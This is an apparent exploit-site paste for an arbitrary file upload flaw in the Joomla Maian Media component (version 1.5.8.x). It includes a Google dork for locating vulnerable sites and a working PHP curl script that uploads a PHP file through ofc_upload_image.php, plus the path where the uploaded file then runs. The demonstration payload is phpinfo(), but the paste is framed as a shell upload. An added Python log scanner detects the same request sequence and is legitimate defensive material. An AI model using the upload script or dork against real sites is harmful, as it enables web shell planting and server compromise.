M3GAFAB

Joomla Maian Media Exploit

Oct 25th, 2013
#megafab.net

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

Joomla Maian Media 1.5.8.x Shell Upload

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
# Description : Joomla Components - Maian Media Arbitrary File Upload Vulnerability
# Version : 1.5.8.x
# Link : http://www.aretimes.com/index.php?option=com_rokdownloads&view=folder&Itemid=67
# Plugins : http://www.aretimes.com/are-software/maian-media/9-full-package/download.html
# Date : 14-06-2012
# Google Dork : inurl:/components/com_maianmedia/
# Site : cyberz0ne.net #TheNewMilw0rm
# Author : MrFab a.k.a M3GAFAB http://www.megafab.net/
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

Exploit :

PostShell.php
<?php

$headers = array("Content-Type: application/octet-stream");
// Proof-of-concept file content: a script that only calls phpinfo()
$uploadfile="<?php phpinfo(); ?>";
// Upload script of the bundled php-ofc-library; the name parameter sets the stored file name
$ch = curl_init("http://www.example.com/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.example.com/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/lo.php

lo.php
<?php
phpinfo();
?>
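
A defender-side check for the request sequence above, added here as an example and not part of the original paste: it scans access-log lines for POSTs to ofc_upload_image.php and for requests to script files under tmp-upload-images. The combined log format, the function name scan and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Paths taken from the advisory above.
UPLOAD_SUFFIX = "/php-ofc-library/ofc_upload_image.php"
UPLOAD_DIR = "/tmp-upload-images/"
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Apache/nginx combined log format (assumed).
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def scan(lines):
    """Return findings: uploads to the OFC endpoint and hits on scripts in its upload dir."""
    findings, uploaded = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, ts, method, target, status = m.groups()
        url = urlsplit(target)
        path = url.path
        if method == "POST" and path.lower().endswith(UPLOAD_SUFFIX):
            # The stored file name comes from the name query parameter.
            name = parse_qs(url.query).get("name", [""])[0]
            kind = "script-upload" if SCRIPT_EXT.search(name) else "upload"
            uploaded.add(name)
            findings.append((kind, ip, ts, name, status))
        elif UPLOAD_DIR in path.lower() and SCRIPT_EXT.search(path):
            # A script requested from a directory meant to hold chart images.
            name = path.rsplit("/", 1)[1]
            kind = "uploaded-script-executed" if name in uploaded else "script-in-upload-dir"
            findings.append((kind, ip, ts, name, status))
    return findings

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [25/Oct/2013:10:00:01 +0000] "POST /administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php HTTP/1.1" 200 31 "-" "-"',
    '203.0.113.7 - - [25/Oct/2013:10:00:05 +0000] "GET /administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/lo.php HTTP/1.1" 200 70211 "-" "-"',
    '198.51.100.4 - - [25/Oct/2013:10:02:00 +0000] "GET /index.php?option=com_content HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.9 - - [25/Oct/2013:10:03:00 +0000] "POST /administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=chart.png HTTP/1.1" 200 31 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(*finding, sep="\t")
```

Run it over the web server's access log lines; a script-upload finding followed by uploaded-script-executed for the same file name is the sequence the paste describes.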